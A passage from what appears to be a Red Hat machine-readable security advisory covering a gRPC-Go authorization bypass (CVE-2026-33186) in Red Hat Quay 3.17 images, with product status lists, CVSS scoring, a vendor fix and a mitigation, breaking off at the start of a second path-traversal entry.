            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2449833"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
          "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-33186"
        },
        {
          "category": "external",
          "summary": "RHBZ#2449833",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449833"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-33186",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186"
        },
        {
          "category": "external",
          "summary": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3",
          "url": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3"
        }
      ],
      "release_date": "2026-03-20T22:23:32.147000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T13:10:36+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22465"
        },
        {
          "category": "workaround",
          "details": "To mitigate this issue, implement infrastructure-level normalization to ensure all incoming HTTP/2 `:path` headers are properly formatted with a leading slash before reaching the gRPC-Go server. This can be achieved by configuring a reverse proxy or API gateway to validate and normalize the `:path` header. Ensure that any such intermediary is properly configured and restarted to apply the changes, which may temporarily impact service availability.",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:65c631d107c264bef8a74336077b413609da4cfc37c8c9488afdcaa0df07dad5_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:8c7f4a453b3414c2d3457f2a8c65b67c70dd55e4bf7a31a9f3674865af5e1da1_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:9e4588550a0e266f7598eb4af1dd020629357ffd305a02d8e7765114c7210812_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-rhel9@sha256:a24c973edd52d4a418d415d54108cf44f495a969db1d0f6e5b6149e0a6021110_arm64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation"
    },
    {
      "cve": "CVE-2026-33747",
      "cwe": {
        "id": "CWE-22",
        "name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
      },
      "discovery_date": "2026-03-27T02:01:29.921765+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:3a55b3ec35c4a8e6359043566b86376871be774355cf8f09b442b268b5f2243a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:5821c6d9fc1efb01b375cd59017be0ab7adb1794e8ab92b03387e7930d73fd75_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:97f144ef4b31ee6cfb154555c6f15ef4184bebf9298b440eb604228435513c79_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/clair-rhel9@sha256:c38a3a6547c9da624e72c0a5092fba5668a66a9b2f440808b8b6f100fa1d1ae8_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:844173e5e8d469ff53b4741735f12c262f70122a83e1a3b44287633f87d922f9_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:07ac14b5985a6d1aab2ad58d0ed6fcd94a538de1c9bd171bc4a4162b2ade6a62_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:53294b9f3b327dcd9cd5e2188d0ee4b0861c00923421de85319f2dc442ce7508_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:8e927b2102b2d5cd45629790d16c5ada1cc327b6a64acb33d36e2c4f7fbd9912_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:b6ca818876d348e6204c808d141be0190946279851a00eb4211888e945c90f80_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7914cfbd30aa0ca0a25b72387ef420879f6eb890b607c88b75f6aa1c9528ed2a_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8838c17d3bb0b1490e23866c3ebc3a7c212d381aab4df0d519a8ea2d6099ae3b_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:8dded1d8b749a07ff9400399ba8a005d59258eb896b9ff66014587e5b8dd63f6_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:f932e889884451edf02937c8c7b858c15542d8f49bed07414c01e9bf4e879bd4_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:466b8c2341eb4d2f6c6dd02c7403e5d96fb011b192b9d3bd1d9519855dee1e5c_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:661fb709bf1bf1b391534159a8df1567245cc791f069035f3c6531ee536cebf8_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:805855fd0e19fcb41d0ee649196ac2eefd19a7af1394c643d1981db033517e27_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-builder-rhel9@sha256:e2e5b4773f22bf9205096f15b3a2275f748c0c3f00f1c480e4f336615a5cea91_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:4aea7185e69a0d0c235cb7d1ee55c9bf4336fe8c2a5a911a9e298d56673f847c_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:0db0854b0aebfbc40f819ee94fadea510ed5b8294a16af0eee88880129d52587_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b3b93f33b172be548f93e48755e0a88e88de33cbe2d65858ee93c5c5fefa5c1f_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:d59de91f679cc4b70d2093d717dbdf3f8bef7322de1d43f7db2470cff1f022e0_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:e1d6574191585e5cc4416c8c6efd5b4dad26b6dba4c54ca4008f8d314d59145d_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-bundle@sha256:706312389cb29f050fbb20ad327d0cdd2adc526fb32346abe1a6e98d64323bfd_amd64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:18eda16fdd54b45a3fe484542d20fb1b1b4fd5b9e38c79d70dc11b4c0e1bab03_ppc64le",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:ce7a9853fdd031d67e796becced393855e1944ecd9e8acb2d589403834d0b7f1_arm64",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:d05c09022220346d62bc4dc57984c7368994d317d5745139191d6aba70599883_s390x",
            "Red Hat Quay 3.17:registry.redhat.io/quay/quay-operator-rhel9@sha256:eb037e300339377b57b964f05c5988b3d8f5a1a8fb63a3e167de6b68dc875e1f_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2452076"
        }
      ],
      "notes": [
        {
          "category": "description",
